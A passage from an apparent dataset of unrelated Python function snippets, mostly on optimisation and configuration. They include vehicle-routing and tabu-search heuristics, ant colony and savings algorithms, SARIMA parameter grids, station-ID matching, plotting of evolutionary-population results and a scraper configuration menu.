vehicle_type0 = 3\r\n else:\r\n vehicle_type0 = 5\r\n\r\n sol_veh_type.append(vehicle_type0)\r\n\r\n used_res = [0, 0, 0, 0] # used volume, and travel time of the vehicle, leave time, travel distance\r\n veh_rout = [0]\r\n\r\n # print '\\nA new vehicle will be used.'\r\n way_time = 0 # travel time of coming to the store + wait time at the store + operation time at this store\r\n while True:\r\n curr_cust = veh_rout[-1]\r\n\r\n next_one, way_time = self.time_nn(way_time, curr_cust, to_vist, used_res, len(veh_rout), vehicle_type0)\r\n next_cust, next_start = next_one[0], next_one[1]\r\n # print('next start', next_cust, next_start)\r\n if next_cust == 0: # next visiting customer is depot\r\n # print 'Get back to the depot, and ready for a new round.'\r\n veh_rout.append(next_cust)\r\n break\r\n\r\n else: # next visiting customer is a store\r\n used_res[0] += (num_demd[next_cust][0] * bskt_vol + num_demd[next_cust][1] * trsf_vol + (num_demd[next_cust][2] + \\\r\n num_demd[next_cust][3]) * milk_vol + num_demd[next_cust][4] * paper_bskt)\r\n used_res[2] = (next_start + oprt_t)\r\n used_res[3] += dist_mat[curr_cust, next_cust]\r\n\r\n\r\n veh_rout.append(next_cust)\r\n # print 'Vehicle used resource: ', used_res\r\n to_vist.remove(next_cust)\r\n\r\n sol.append(veh_rout)\r\n route_way_time.append(way_time)\r\n\r\n # print 'Last point 0 earliest leave time: ', int(used_res[-1]) / 60, ':', int(used_res[-1]) % 60\r\n # print 'Route %s is: ' % itr, veh_rout\r\n print('*'*10, 'Iteration:', itr, '*'*10)\r\n\r\n\r\n if len(to_vist) > 0:\r\n print('number of stores remained: ', len(to_vist))\r\n\r\n return sol, sol_veh_type, route_way_time", "def combine_all_populations(folder: str,\n max_v: int = None,\n neat: bool = False,\n neat_gru: bool = False,\n neat_lstm: bool = False,\n neat_sru: bool = False,\n neat_sru_s: bool = False,\n ):\n # Collect all the populations\n populations = []\n if neat: populations.append(D_NEAT)\n if neat_gru: populations.append(D_NEAT_GRU)\n if neat_lstm: populations.append(D_NEAT_LSTM)\n if neat_sru: populations.append(D_NEAT_SRU)\n if neat_sru_s: populations.append(D_NEAT_SRU_S)\n if len(populations) == 0: return\n \n # Collect all the measure options\n OPTIONS = ['distance', 'finished', 'fitness', 'score', 'time', 'training']\n # OPTIONS = ['fitness']\n \n # Go over all possibilities\n print(f\"\\n===> COMBINING POPULATIONS OF FOLDER {folder} <===\")\n path = f\"population_backup/storage/{folder}/\"\n path_images = get_subfolder(path, 'images')\n for option in OPTIONS:\n plt.figure(figsize=(8, 2.5))\n max_data = 0\n max_gen = 0\n for pop in populations:\n # Load the dictionary\n d = load_dict(f\"{path}{pop}/evaluation/{option}\")\n size = len(list(d.values())[0])\n if max_v: assert size == max_v\n \n # Prepare the data containers\n q1 = []\n q2 = [] # Median\n q3 = []\n idx_q1 = int(round(1 / 4 * size))\n idx_q2 = int(round(2 / 4 * size))\n idx_q3 = int(round(3 / 4 * size))\n \n # Loop over each iteration\n x = sorted([int(k) for k in d.keys()])\n for g in x:\n if g > max_gen: max_gen = g\n lst = sorted(d[str(g)]) # Sort values from low to high\n q1.append(lst[idx_q1])\n q2.append(lst[idx_q2])\n q3.append(lst[idx_q3])\n \n # Plot the results\n plt.plot(x, q1, color=COLORS[pop], linestyle=\":\", linewidth=.5)\n plt.plot(x, q3, color=COLORS[pop], linestyle=\":\", linewidth=.5)\n plt.plot(x, q2, color=COLORS[pop], linestyle=\"-\", linewidth=2, label=pop)\n plt.fill_between(x, q1, q3, color=COLORS[pop], alpha=0.2)\n \n # Update the max-counter\n if max(q3) > max_data: max_data = max(q3)\n \n # Finalize the figure\n leg = plt.legend(loc='upper center',\n bbox_to_anchor=(0.5, 1.25),\n fancybox=True,\n fontsize=10,\n ncol=len(populations))\n for line in leg.get_lines():\n line.set_linewidth(4.0)\n # plt.xticks([i * 100 for i in range(11)]) # TODO\n plt.xlabel(\"generation\")\n plt.xlim(0, max_gen)\n # plt.yticks([i for i in range(7)]) # TODO\n plt.ylabel(option)\n plt.ylim(0, max(max_data * 1.05, 1.05))\n # plt.ylim(0, 6) # TODO\n plt.grid()\n plt.tight_layout()\n plt.savefig(f\"{path_images}comb_{option}.png\", bbox_inches='tight', pad_inches=0.02, dpi=500)\n # plt.savefig(f\"{path_images}comb_{option}.eps\", format=\"eps\", bbox_inches='tight', pad_inches=0.02)\n # plt.show()\n plt.close()", "def save_final_config(self, configuration):\n # outfile = 'passes_final.json'\n # print \"Optimal passes written to \" + outfile + \":\", configuration.data\n # self.manipulator().save_to_file(configuration.data, outfile)\n msg = \"Tuned on program {0}, with priority {1}. \\nBest pass ordering found:\\n{2}\".format(\n self.args.makefile, OPT_LVL, self.build_options(configuration.data))\n print msg\n self.make(\"clean\")", "def test_get_best_candidate(self):\n optimizer = \"RandomSearch\"\n name = \"test_init_experiment\"\n param_defs = {\n \"x\": MinMaxNumericParamDef(0, 1),\n \"name\": NominalParamDef([\"A\", \"B\", \"C\"])\n }\n minimization = True\n\n LAss = PrettyLabAssistant()\n LAss.init_experiment(name, optimizer, param_defs, minimization=minimization)\n cand_one = LAss.get_next_candidate(name)\n cand_one.result = 1\n LAss.update(name, cand_one)\n\n cand_two = LAss.get_next_candidate(name)\n cand_two.result = 0\n LAss.update(name, cand_two)\n\n assert_equal(cand_two, LAss.get_best_candidate(name))", "def get_winners(self):\n\n if self.optimal is not None:\n return self.optimal\n clean_proposals = self.cleaner.create_scenarios(self.proposals)\n self.optimal = self.optimizer.optimize(clean_proposals)\n return self.optimal", "def init(self):\n self.best_feas_value = self.solver.sense.worst_value\n self.worst_feas_value = self.solver.sense.best_value", "def runAlg_noPrints(self):\n alpha = self.__problem.getAlpha()\n beta = self.__problem.getBeta()\n q0 = self.__problem.getQ0()\n rho = self.__problem.getRho()\n \n bestSol= Ant(self.__n)\n \n for i in range(self.__noEpoch):\n antSol = self.iteration(alpha, beta, q0, rho)\n if antSol.evaluate() < bestSol.evaluate():\n bestSol.setSolution ( deepcopy(antSol.getSolution()) )\n if bestSol.evaluate() == 1 :\n return bestSol\n\n return bestSol", "def savings_algorithm(self):\n self.generate_trivial_tours() # generate trivial solution\n while True: # endless loop\n maxSavings = 0 # values for best savings decision\n bestr1 = None\n bestr2 = None\n for r1 in self.routes: # loop through all route combinations\n for r2 in self.routes:\n if r1 != r2:\n currentSavings = self.savings2routes(r1,r2)\n if currentSavings > maxSavings: # if the savings are greater than the so far best savings\n bestr1 = r1 # store the routes and the savings value\n bestr2 = r2\n maxSavings = currentSavings\n if (bestr1 == None): # if no savings or no feasible joins exist break out of the loop\n break\n newRoute = VRP_Route(bestr1.route+bestr2.route) # generate new route and delete old routes\n self.routes.remove(bestr1)\n self.routes.remove(bestr2)\n self.routes.append(newRoute)\n self.get_objective()\n return self.objective", "def get_best_solution(self):\n if not self.tours:\n raise Exception('No solution has been computed yet')\n scores = {s:get_cost(self.tours[s],self) for s in self.tours}\n best = min(scores,key=scores.get)\n print('The best solution is given by {} with score {}'.format(best,scores[best]))\n return self.tours[best]", "def get_station_configuration_new(stations_id, station_configuration):\n \n \"\"\" Gets the primary station_id from the station_configuration table. \n station_id is the id taken from the input file.\n First it checks if a primary_id in th estation_conf file matches the station_id, \n otherwise it looks for an element in the list of secondary ids. \n \"\"\"\n\n for s in stations_id:\n s = str(s)\n try:\n si = s.decode('utf-8')\n except:\n si = s \n #if ':' in si:\n # si = si.split(':')[1]\n \n station_id_primary = numpy.string_( '0-20000-0-' + si ) # remove the prefix to the station id \n station_id_primary_alternative = numpy.string_( '0-20001-0-' + si )\n \n \"\"\" First, check for matching primary_id. \n If not found, check for secondary id. Note that secondary is a list, so must loop over the entry to find a matching one \"\"\"\n \n matching_primary = station_configuration.loc[station_configuration['primary_id'] == station_id_primary ]\n matching_primary_alt = station_configuration.loc[station_configuration['primary_id'] == station_id_primary_alternative ]\n \n if len(matching_primary) > 0:\n return matching_primary \n \n elif len(matching_primary_alt) > 0 :\n return matching_primary_alt \n \n else:\n secondary = station_configuration['secondary_id'] \n \n for second in secondary:\n try: # this try is needed when the secondary ids are not defined or wrong, and the primary id cannot be matched with the station_id \n sec_list = second.decode('utf-8') # secondary ids are separated by a comma, so I loop over the list\n except:\n try:\n sec_list = str(second)\n except: \n pass\n \n #if ':' in sec_list: # might be : or C: in the secndary id , e.g. C:5852 \n # sec_list = sec_list.split(':')[1]\n \n if sec_list == si:\n sc = station_configuration.loc[station_configuration['secondary_id'] == second ]\n #print(\"FOUND a secondary !!!\" \n return sc \n try:\n if str(second) == si:\n sc = station_configuration.loc[station_configuration['secondary_id'] == second ]\n #print(\"FOUND a secondary !!!\")\n return sc \n except:\n pass \n \n return None", "def find_best_solution_and_score(self):\r\n best_score = MAXSIZE\r\n best_solution = self.simulation.solutions[0]\r\n for solution in self.simulation.solutions:\r\n score = self.simulation.fitting_function.fit_score(solution)\r\n if score < best_score:\r\n best_score = score\r\n best_solution = solution\r\n return best_solution, best_score", "def choose_bestnext(self, round):\n board_percentage = []\n \n for i in self.possible_coords:\n iSq = round.getSq(i[0], i[1])\n \n if round.pr_hook(iSq) == ' X ':\n sq_percentage = []\n surroundings = iSq.point_neighbors()\n \n for j in surroundings:\n jSq = round.getSq(j[0], j[1])\n\n if round.as_int(jSq) != None:\n count_X = 0\n count_F = 0\n check = jSq.point_neighbors()\n\n for k in check:\n kSq = round.getSq(k[0], k[1])\n if round.pr_hook(kSq) == ' X ':\n count_X += 1\n elif round.pr_hook(kSq) == ' f ':\n count_F += 1 \n if count_X != 0:\n sq_percentage.append((jSq.mine_neighbors() - count_F)/ count_X)\n\n avg_percent = 0\n if len(sq_percentage) == 0:\n avg_percent = 0.8\n elif sq_percentage.count(1) != 0:\n avg_percent = 1\n round.flagSq(i[0], i[1])\n else:\n sum_so_far = 0\n for p in sq_percentage:\n sum_so_far += p\n avg_percent = sum_so_far / len(sq_percentage)\n \n board_percentage.append(avg_percent)\n\n else:\n board_percentage.append(100)\n\n sorted_percentages = board_percentage.copy()\n sorted_percentages.sort()\n\n best_choice = board_percentage.index(sorted_percentages[0])\n\n return self.possible_coords[best_choice]", "def solve(self):\n\n tracks_copy = self.tracks.copy()\n vehicles_sorted = sorted(self.vehicles, key=lambda x: x.departure_time)\n\n vehicles_added = 0\n while len(vehicles_sorted) != 0:\n best_ratio = - sys.maxsize - 1\n best_track = None\n best_vehicle = None\n shuffle(tracks_copy)\n\n for vehicle in vehicles_sorted:\n for track in tracks_copy:\n if track.add_vehicle(vehicle, self.tracks):\n self.grader.reinitialize_grader()\n goal1 = self.grader.calculate_first_global_goal()\n goal2 = self.grader.calculate_second_global_goal()\n ratio = goal2 / goal1\n if ratio > best_ratio:\n best_ratio = ratio\n best_track = track\n best_vehicle = vehicle\n\n track.remove_last()\n\n if best_vehicle is not None and best_track is not None:\n vehicles_added += 1\n best_track.add_vehicle(best_vehicle, self.tracks)\n vehicles_sorted.remove(best_vehicle)\n else:\n self.grader.reinitialize_grader()\n goal1 = self.grader.calculate_first_global_goal()\n goal2 = self.grader.calculate_second_global_goal()\n if goal1 < self.optimal_gg1 and goal2 > self.optimal_gg2:\n self.optimal_gg1 = goal1\n self.optimal_gg2 = goal2\n self.optimal_tracks = self.tracks\n return False\n\n self.grader.reinitialize_grader()\n goal1 = self.grader.calculate_first_global_goal()\n goal2 = self.grader.calculate_second_global_goal()\n print(\"Success:\", goal1, goal2)\n if goal1 < self.best_gg1 and goal2 > self.best_gg2:\n self.best_gg1 = goal1\n self.best_gg2 = goal2\n self.best_tracks = self.tracks\n\n return True", "def get_station_configuration_f(stations_id, station_configuration):\n \n \"\"\" Gets the primary station_id from the station_configuration table. \n station_id is the id taken from the input file.\n First it checks if a primary_id in th estation_conf file matches the station_id, \n otherwise it looks for an element in the list of secondary ids. \n \"\"\"\n\n for s in stations_id:\n s = str(s)\n try:\n si = s.decode('utf-8')\n except:\n si = s \n if ':' in si:\n si = si.split(':')[1]\n \n station_id_primary = numpy.string_( '0-20000-0-' +si ) # remove the prefix to the station id \n station_id_primary_alternative = numpy.string_( '0-20001-0-' + si )\n \n \n \"\"\" First, check for matching primary_id. \n If not found, check for secondary id. Note that secondary is a list, so must loop over the entry to find a matching one \"\"\"\n \n matching_primary = station_configuration.loc[station_configuration['primary_id'] == station_id_primary ]\n matching_primary_alt = station_configuration.loc[station_configuration['primary_id'] == station_id_primary_alternative ]\n \n if len(matching_primary) > 0:\n return matching_primary \n \n elif len(matching_primary_alt) > 0 :\n return matching_primary_alt \n \n else:\n secondary = station_configuration['secondary_id'] \n \n for second in secondary:\n try: # this try is needed when the secondary ids are not defined or wrong, and the primary id cannot be matched with the station_id \n sec_list = second.decode('utf-8') # secondary ids are separated by a comma, so I loop over the list\n except:\n try:\n sec_list = str(second)\n except: \n pass\n \n if ':' in sec_list: # might be : or C: in the secndary id , e.g. C:5852 \n sec_list = sec_list.split(':')[1]\n \n if sec_list == si:\n sc = station_configuration.loc[station_configuration['secondary_id'] == second ]\n #print(\"FOUND a secondary !!!\" \n return sc \n try:\n if str(second) == si:\n sc = station_configuration.loc[station_configuration['secondary_id'] == second ]\n #print(\"FOUND a secondary !!!\")\n return sc \n except:\n pass \n \n return None", "def decide_next_query(self):\n for gp in self.gps:\n build_gp_posterior(gp)\n # Find the best mean values for each gp.\n best_f, best_pt, best_gain = None, None, float('-inf')\n queries = self._get_queried_pts()\n for f_idx, f_name in enumerate(self.f_names):\n gp = self.gps[f_idx]\n f_qs = queries[f_name]\n # Assemble points to draw sample from.\n low, high = zip(*self.domains[f_idx])\n rand_pts = np.random.uniform(low, high,\n (self.options.max_opt_evals, len(low)))\n samp_pts = np.vstack([f_qs, rand_pts])\n samp_vals = gp.draw_sample(samp_pts=samp_pts).ravel()\n max_prev = np.max(samp_vals[:len(f_qs)])\n best_new_idx = np.argmax(samp_vals[len(f_qs):]) + len(f_qs)\n gain = samp_vals[best_new_idx] - max_prev\n if gain > best_gain:\n best_f = f_idx\n best_pt = samp_pts[best_new_idx]\n best_gain = gain\n return best_f, best_pt", "def sarima_configs(seasonal=[1, 24, 168]):\n\n models = list()\n # define config lists\n p_params = [0, 1, 2]\n d_params = [0, 1]\n q_params = [0, 1, 2]\n t_params = ['n', 'c', 't', 'ct']\n P_params = [0, 1, 2]\n D_params = [0, 1]\n Q_params = [0, 1, 2]\n m_params = seasonal\n # create config instances\n for p in p_params:\n for d in d_params:\n for q in q_params:\n for t in t_params:\n for P in P_params:\n for D in D_params:\n for Q in Q_params:\n for m in m_params:\n cfg = [(p, d, q), (P, D, Q, m), t]\n models.append(cfg)\n return models", "def run(self):\n\n # init\n base_value = self._problem.evaluate()\n self._problem.set_as_best(base_value)\n\n # init iteration (used to count the amount of iterations)\n iteration = 0\n\n # add to data\n self._data_append(self.data, iteration, base_value, base_value)\n\n # init termination criterion\n self._termination_criterion.check_first_value(base_value)\n self._termination_criterion.start_timing()\n\n # main loop\n while self._termination_criterion.keep_running():\n\n # search the neighbourhood for the best move\n best_found_delta = self._best_found_delta_base_value\n best_found_move = None\n\n for move in self._problem.get_moves():\n\n # check quality move\n delta = self._problem.evaluate_move(move)\n\n # checks how the move alters the current state\n diff = self._diff(move)\n\n # if not in tabu list --> not similar to earlier performed\n # moves --> if delta better than old best move\n # --> becomes the best move\n\n if not self._tabu_list.contains(diff) and \\\n self._is_better(best_found_delta, delta):\n best_found_delta = delta\n best_found_move = move\n best_found_diff = diff\n\n # the best found move will be used as the next move\n # alter state problem\n base_value = base_value + best_found_delta\n\n # check if a move was found\n if best_found_move is not None:\n\n self._problem.move(best_found_move)\n\n # if better than best found --> new best_found\n if self._is_better(self._problem.best_order_value,\n base_value):\n self._problem.set_as_best(base_value)\n # log the better solution\n self._log_improvement(base_value)\n\n # add diff to tabu list\n self._tabu_list.add(best_found_diff)\n\n # add to data\n self._data_append(self.data, iteration,\n base_value, self._problem.best_order_value)\n\n self._termination_criterion.check_new_value(base_value)\n\n # functions _termination_criterion called\n self._termination_criterion.check_new_value(base_value)\n\n else:\n # no move found --> we're stuck --> break loop\n break\n\n iteration += 1\n self._termination_criterion.iteration_done()\n\n # last data point\n self._data_append(self.data, iteration, base_value,\n self._problem.best_order_value)\n\n # if we have data:\n # convert data to something easier to plot\n if self.data is not None:\n\n # convert to tuple of list\n data = convert_data(self.data)\n\n # make namedtuple\n DataAsLists = namedtuple(\n 'Data', ['time', 'iteration', 'value', 'best_value'])\n\n data = DataAsLists(data[0], data[1], data[2], data[3])\n\n else:\n data = None\n\n # return results\n\n Results = namedtuple('Results', ['best_order', 'best_value', 'data'])\n\n return Results(self._problem.best_order,\n self._problem.best_order_value,\n data)", "def tryEverything(g, verbose, graphname):\r\n prio = ['rku', 'random', 'BIL', 'rkd', 'cluHPS', 'rkusd', 'rkuad']\r\n placement = ['eft', 'BIM*', 'OLB', 'MET', 'DL', 'GDL']\r\n costFunction = ['mean', 'median', 'maxmax', 'minmax', 'minmin', 'maxmin']\r\n desc = ['DLS/DC', None, 'DCP']\r\n useOfBIM = [False, True]\r\n insertion = [False, True]\r\n BSA = [False, True]\r\n res: Dict[str, List[float]] = {}\r\n cnt = 0\r\n\r\n for ip, p in enumerate(prio):\r\n for ipl, pl in enumerate(placement):\r\n for ic, c in enumerate(costFunction):\r\n if p != 'BIL' or c == 'mean' or pl in ['DL', 'GDL']:\r\n for idd, d in enumerate(desc):\r\n for iu, u in enumerate(useOfBIM):\r\n for ii, i in enumerate(insertion):\r\n for ib, b in enumerate(BSA):\r\n cnt += 1\r\n name = \";\".join(map(str, [ip, ic, ipl, idd, iu, ii, ib]))\r\n\r\n # dispName = \"-\".join(map(str, [p, pl, c, d, u, i, b]))\r\n # print(\"Heuristic n°\", cnt, \"-\", dispName)\r\n # print(\"Heuristic n°\", cnt, \"-\", name)\r\n\r\n startScheduling = timeit.default_timer()\r\n try:\r\n schedule = computeSchedule(g, strategyPrio=p, costFunction=c,\r\n strategyPlacement=pl,\r\n useOfBIM=u, desc=d,\r\n insertion=i, bsa=b, verbose=verbose)\r\n verifPrec(g, schedule, verbose)\r\n endScheduling = timeit.default_timer()\r\n # print(\"Ended in :\", 1000*(endScheduling - startScheduling), \"ms\")\r\n # print(\"Ended in :\", round(1000 * (endScheduling - startScheduling),2), \"ms\")\r\n timeS = round(1000 * (endScheduling - startScheduling), 2)\r\n # print(f\"timeS : {timeS}\")\r\n if verbose:\r\n print(f\"Time : {timeS}ms\")\r\n res[name] = [round(schedule[getExitTask(g)][2], 6), timeS]\r\n except Exception as _:\r\n\r\n print(\"Error for : \" + name + \" on file \" + graphname)\r\n file = open(\"error.log\", 'a')\r\n file.write(f\"Error for {name} on file {graphname}\\n\")\r\n file.close()\r\n raise _\r\n return res\r\n return res", "def _select_configurations(self) -> typing.List[Configuration]:\n\n cs = self.scenario.cs\n params = cs.get_hyperparameters()\n\n constants = 0\n for p in params:\n if isinstance(p, Constant):\n constants += 1\n\n sobol = sobol_seq.i4_sobol_generate(len(params) - constants, self.init_budget)\n\n return self._transform_continuous_designs(design=sobol,\n origin='Sobol',\n cs=cs)", "def config_params0(data,parameter):\n model = []\n #Range of value of p\n acf = sm.graphics.tsa.acf(data.diff().dropna())\n for i in range(len(acf)):\n acf[i] = abs(acf[i]*10)\n if (ceil(acf[i])) <= 2:\n p = range(ceil(acf[i])-1,ceil(acf[i])+2)\n break\n\n #range of value of q\n pacf = sm.graphics.tsa.pacf(data.diff().dropna())\n for i in range(len(pacf)):\n pacf[i] = abs(pacf[i]*10)\n if (ceil(pacf[i])) <= 2:\n q = range(ceil(pacf[i])-1,ceil(pacf[i])+2)\n break\n\n\t# define config lists\n p_params = p\n d_params = parameter['d']\n q_params = q\n m_params = parameter['m']\n #P_params = p\n #D_params = [0, 1]\n #Q_params = q\n \n pdq_m = list(itertools.product(p_params, d_params, q_params,m_params)) #Generate all different combinations of p, q and q triplets\n params = [[(x[0], x[1], x[2]),(x[0], x[1], x[2], x[3])] for x in pdq_m]\n return params", "def get_configs():\n global configs, sensors, config_curr_location, config_max_temperature\n global config_min_temperature, config_temperature_measurement\n global config_sunrise, config_sunset, config_gpio_heater\n global config_gpio_light, config_night_max_temperature, heaterRecoveryTime\n global config_tomorrow_sunrise, config_tomorrow_sunset\n global desc_curr_location, desc_max_temperature\n global desc_min_temperature, desc_temperature_measurement\n global desc_sunrise, desc_sunset, desc_gpio_heater\n global desc_gpio_light, desc_night_max_temperature, desc_heaterRecoveryTime\n global desc_tomorrow_sunrise, desc_tomorrow_sunset, desc_tempSunrise, desc_tempSunset\n\n configs.clear()\n configs = t.get_config_values()\n for c in configs:\n if c[\"name\"] == \"Max Temperature\":\n config_max_temperature = c[\"value\"]\n desc_max_temperature = c[\"comment\"]\n\n if c[\"name\"] == \"Min Temperature\":\n config_min_temperature = c[\"value\"]\n desc_min_temperature = c[\"comment\"]\n\n if c[\"name\"] == \"Temperature Measurement\":\n config_temperature_measurement = c[\"value\"]\n desc_temperature_measurement = c[\"comment\"]\n\n if c[\"name\"] == \"Location\":\n config_curr_location = c[\"value\"]\n desc_curr_location = c[\"comment\"]\n\n if c[\"name\"] == \"Heater GPIO\":\n config_gpio_heater = int(c[\"value\"])\n desc_gpio_heater = c[\"comment\"]\n\n if c[\"name\"] == \"Light GPIO\":\n config_gpio_light = int(c[\"value\"])\n desc_gpio_light = c[\"comment\"]\n\n if c[\"name\"] == \"Night Time Max Temperature\":\n config_night_max_temperature = c[\"value\"]\n desc_night_max_temperature = c[\"comment\"]\n\n if c[\"name\"] == \"Heater Recovery Time\":\n heaterRecoveryTime = c[\"value\"]\n desc_heaterRecoveryTime = c[\"comment\"]\n\n if c[\"name\"] == \"Sunrise\":\n tempSunrise = c[\"value\"]\n desc_tempSunrise = c[\"comment\"]\n\n if c[\"name\"] == \"Sunset\":\n tempSunset = c[\"value\"]\n desc_tempSunset = c[\"comment\"]\n\n debug_logging(\"Information\", \"Retrieving latest sensor\")\n #sensors.clear()\n #sensors = t.get_sensors()\n #for s in sensors:\n #debug_logging(\n #\"Information\",\n #(\n #\"Added Sensor ID: {0}, Sensor Name: {1}, Device ID: {2}\"\n #.format(s[\"id\"], s[\"name\"], s[\"folder_id\"])\n #)\n #)\n\n if(config_curr_location != \"\"):\n curr_lat, curr_long = t.get_location_lat_long(config_curr_location)\n ro = SunriseSunset(datetime.now(), latitude=curr_lat, longitude=curr_long, localOffset=9.5)\n rise_time, set_time = ro.calculate()\n config_sunrise = rise_time.strftime(\"%I:%M %p\")\n config_sunset = set_time.strftime('%I:%M %p')\n\n debug_logging(\"Information\",\n (\"The sun will rise at {0} and will set at {1} for the lcation {2}, {3}\"\n .format(rise_time.strftime(\"%I:%M %p\"), set_time.strftime('%I:%M %p'), curr_lat, curr_long)))\n\n ro = SunriseSunset(datetime.now() + timedelta(days=1),\n latitude=curr_lat, longitude=curr_long, localOffset=9.5)\n rise_time, set_time = ro.calculate()\n config_tomorrow_sunrise = rise_time.strftime(\"%I:%M %p\")\n config_tomorrow_sunset = set_time.strftime('%I:%M %p')\n else:\n config_sunrise = tempSunrise\n config_sunset = tempSunset\n\n debug_logging(\"Information\",\n (\"No location value retrieved from database, using database sunrise ({0}) and sunset ({1}) values\"\n .format(tempSunrise, tempSunset)))", "def __return_best_hotspot(self, dup_dict):\n hotspots = dup_dict[dup_dict.keys()[0]]\n fewest_alt_alleles = 10\n\n hotspot_with_fewest_alleles = []\n for hotspot in hotspots:\n if len(hotspot['ALT']) < fewest_alt_alleles:\n fewest_alt_alleles = len(hotspot['ALT'])\n\n del hotspot_with_fewest_alleles[:]\n hotspot_with_fewest_alleles = []\n hotspot_with_fewest_alleles.append(hotspot)\n elif len(hotspot['ALT']) == fewest_alt_alleles:\n hotspot_with_fewest_alleles.append(hotspot)\n\n if len(hotspot_with_fewest_alleles) == 1:\n best_hotspot = hotspot_with_fewest_alleles[0]\n return best_hotspot['CHROM'], best_hotspot['POS'], best_hotspot['REF'], \",\".join(best_hotspot['ALT'])\n\n # Now checking for the highest number of variants that pass the qc parameters.\n highest_hotspot_count = 0\n most_frequent_hotspot = []\n for hotspot in hotspots:\n if hotspot['orig_stats']['qc']['final_qc_count'] > highest_hotspot_count:\n highest_hotspot_count = len(hotspot['ALT'])\n\n del most_frequent_hotspot[:]\n most_frequent_hotspot = []\n most_frequent_hotspot.append(hotspot)\n elif hotspot['orig_stats']['qc']['final_qc_count'] == highest_hotspot_count:\n most_frequent_hotspot.append(hotspot)\n\n best_hotspot = most_frequent_hotspot[0]\n return best_hotspot['CHROM'], best_hotspot['POS'], best_hotspot['REF'], \",\".join(best_hotspot['ALT'])", "def run(self):\n # Cache parameters and arrays\n nstat = self.north.shape[1]\n ind = self.istart\n solver = self.solver\n cutoff = self.cutoff\n shared = self.shared\n\n # Check if penalties are arrays\n arrflag = [isinstance(arr, np.ndarray) for arr in [self.penn,self.pene,self.penu]]\n arrflag = reduce(operator.mul, arrflag, 1)\n\n # Loop over my portion of GPS stations\n for jj in range(nstat):\n # Unpack component-wise indices of valid observations\n bool_east, bool_north, bool_up = self.bool_list[jj]\n # Extract valid observations\n dnorth, deast, dup = (self.north[bool_north,jj], \n self.east[bool_east,jj], \n self.up[bool_up,jj])\n wn, we, wu = (self.wn[bool_north,jj], \n self.we[bool_east,jj], \n self.wu[bool_up,jj])\n Gn, Ge, Gu = self.G[bool_north,:], self.G[bool_east,:], self.G[bool_up,:]\n # Perform estimation and store weights\n if arrflag:\n northPen, eastPen, upPen = self.penn[jj,:], self.pene[jj,:], self.penu[jj,:]\n else:\n northPen, eastPen, upPen = self.penn, self.pene, self.penu\n shared.m_north[:,ind], qn = solver.invert(dmultl(wn,Gn), wn*dnorth, northPen)\n shared.m_east[:,ind], qe = solver.invert(dmultl(we,Ge), we*deast, eastPen)\n shared.m_up[:,ind], qu = solver.invert(dmultl(wu,Gu), wu*dup, upPen)\n # Now modify the shared penalty array\n if arrflag:\n shared.penn[ind,:] = qn[cutoff:]\n shared.pene[ind,:] = qe[cutoff:]\n shared.penu[ind,:] = qu[cutoff:]\n ind += 1\n\n # done\n return", "def main(tuning_yamls_path):\n all_tuning_config_yaml = 'tuning_params_all.yaml'\n with open(os.path.join(tuning_yamls_path, all_tuning_config_yaml), 'r', encoding='utf-8') as file:\n all_config = yaml.safe_load(file)\n for path, _, yamls in os.walk(tuning_yamls_path):\n for yaml_file in yamls:\n if yaml_file == all_tuning_config_yaml:\n continue\n with open(os.path.join(path, yaml_file), 'r', encoding='utf-8') as file:\n yaml_config = yaml.safe_load(file)\n for index, value in enumerate(yaml_config['object']):\n for _, val in enumerate(all_config['object']):\n if val['name'] == value['name']:\n yaml_config['object'][index] = val\n break\n with open(os.path.join(path, yaml_file), 'w', encoding='utf-8') as file:\n file.write(yaml.dump(yaml_config, sort_keys=False))", "def set_config():\n available_configs = open('HousingPriceScraper/HousingPriceScraper/configs/input_url_config_descriptions.txt', 'r')\n options = available_configs.readlines()\n options_dict = {}\n print('available configs include:\\n')\n for option in enumerate(options):\n options_dict[option[0]] = option[1].split(':')[0]\n print('\\t{} - {}'.format(option[0], option[1].replace('\\n', '')))\n print('\\t{} - back'.format(len(options)))\n chosen = input('\\ncomma separate for multiple\\n').split(',')\n if (str(len(options)) in chosen) or (chosen == ['']):\n return True\n configs = []\n for choice in chosen:\n if int(choice) in options_dict:\n with open('HousingPriceScraper/HousingPriceScraper/configs/input_urls/{}.json'.format(options_dict[int(choice)])) as f:\n configs.append(json.load(f))\n final_config = defaultdict(list)\n for config in configs:\n for key, value in config.items():\n if key in final_config:\n final_config[key] += value\n else:\n final_config[key] = value\n for key, value in final_config.items():\n if any(isinstance(val, list) for val in value):\n final_config[key] = flatten_list_of_lists(value, make_set=True)\n with open('HousingPriceScraper/HousingPriceScraper/configs/input_urls/defaults.json') as default_urls_json:\n default_dict = json.load(default_urls_json)\n for key, value in default_dict.items():\n if key not in final_config.keys():\n final_config[key] = value\n with open('HousingPriceScraper/HousingPriceScraper/configs/chosen_urls.json', 'w') as fp:\n json.dump(final_config, fp, sort_keys=True, indent=4)\n return True", "def run(self):\n print(' strategies...')\n matrix_file = ''\n matrix_s, matrix_c = None, None\n # run for all but the optimal version\n item2matrix = os.path.join(self.data_set.base_folder, 'item2matrix.txt')\n for rec_type in self.data_set.graphs:\n for graph in self.data_set.graphs[rec_type]:\n print(' ', graph)\n gt_graph = load_graph(graph)\n for strategy in Strategy.strategies:\n if strategy == 'optimal':\n continue\n print(' ', strategy)\n m_new = self.data_set.matrices[rec_type][graph][strategy][0]\n m_newc = self.data_set.matrices[rec_type][graph][strategy][1]\n debug(' ----', m_new)\n debug(' ----', m_newc)\n if not m_new:\n debug(' ---- not m_new')\n matrix_s, matrix_c, matrix_file = None, None, None\n elif matrix_file != m_new:\n matrix_s = SimilarityMatrix(item2matrix, m_new)\n matrix_c = SimilarityMatrix(item2matrix, m_newc)\n matrix_file = m_new\n debug(' ---- matrix_file != m_new')\n # for miss in self.data_set.missions[rec_type][graph][strategy]:\n for miss in Mission.missions:\n print(' ', miss)\n if 'Information Foraging' in miss or 'Berrypicking' in miss:\n matrix = matrix_c\n else:\n matrix = matrix_s\n for m in self.data_set.missions[rec_type][graph][strategy][miss]:\n for ti in xrange(len(m.targets_original)):\n start = m.path[-2] if m.path else m.start\n debug('++++' * 16, 'mission', ti, '/',\n len(m.targets_original))\n debug(m.targets_original[ti])\n self.navigate(gt_graph, strategy, m, start,\n None, matrix)\n if ti > 0 and len(m.targets_original[ti]) == len(m.targets[0]):\n # print('breaking...')\n m.reset()\n break\n if not (ti + 1) == len(m.targets_original):\n m.path.append(u'*')\n m.reset()\n\n # run the simulations for the optimal solution\n print(' optimal...')\n for rec_type in self.data_set.graphs:\n for graph in 